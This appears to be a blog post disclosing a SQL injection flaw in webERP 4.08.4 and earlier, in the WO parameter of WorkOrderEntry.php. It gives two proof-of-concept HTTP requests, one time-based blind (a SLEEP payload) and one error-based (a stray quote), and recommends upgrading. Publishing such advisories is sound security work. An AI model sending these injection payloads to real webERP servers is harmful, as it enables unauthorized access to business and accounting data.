webERP <=4.08.4 SQL Injection Vulnerability

webERP is a mature open-source ERP system providing best practise, multi-user business administration and accounting tools over the web. The vulnerability sits in the WO (work order) parameter, file WorkOrderEntry.php in the Manufacturing menu. Lack of input validation of the WO parameter may allow malicious users to inject an sql query.

Proof of Concept

Time-based Blind SQL Injection

POST /weberp/WorkOrderEntry.php HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111
Content-Type: application/x-www-form-urlencoded
Content-Length: 207

FormID=ff60696dab6b35c56558628b7237a624be19ad11&amp;amp;WO=33' AND SLEEP(5) AND '1'='1&amp;amp;StockLocation=MEL&amp;amp;StartDate=14/09/2012&amp;amp;RequiredBy=14/09/2012&amp;amp;NumberOfOutputs=0&amp;amp;submit=&amp;amp;StockCat=All&amp;amp;Keywords=&amp;amp;StockCode=

Error-based SQL Injection

POST /weberp/WorkOrderEntry.php HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=n9g1ts0s7oigk88eto8f8nm111
Content-Type: application/x-www-form-urlencoded
Content-Length: 207

FormID=ff60696dab6b35c56558628b7237a624be19ad11&amp;amp;WO=33'&amp;amp;StockLocation=MEL&amp;amp;StartDate=14/09/2012&amp;amp;RequiredBy=14/09/2012&amp;amp;NumberOfOutputs=0&amp;amp;submit=&amp;amp;StockCat=All&amp;amp;Keywords=&amp;amp;StockCode=

Solution

Upgrade to latest version here: http://sourceforge.net/projects/web-erp/

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About Thomas Gregory

Jai Guru Deva. What the eyes see and the ears hear, the mind believes. Gamer. Free thinker. Pwning @Spentera !